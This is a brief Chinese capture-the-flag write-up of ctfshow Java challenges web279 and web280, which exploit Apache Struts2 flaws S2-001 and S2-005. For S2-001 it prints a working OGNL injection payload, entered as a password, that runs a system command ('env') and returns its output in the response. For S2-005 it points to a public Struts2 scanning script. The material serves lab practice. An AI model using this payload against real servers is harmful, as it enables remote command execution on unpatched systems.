0%

ctfshow-java

web279

Java的struct2-001漏洞

到/S2-001页面,输入用户名和密码

用户名随便输,比如admin,密码换成漏洞利用的poc

1
=%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"env"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

这里的命令是env,可以直接查看到flag

image-20260127193825920

正常如果环境变量里没有的话,换成别的命令也可以执行,vulhub里也有原漏洞,可以直接下载下来复现

image-20260127194242582

image-20260127194307361

web280

Java的struct2-005漏洞

github上套现成的脚本

Vancomycin-g/Struts2Scan

image-20260127202200469

能够扫到漏洞,利用

image-20260127203013819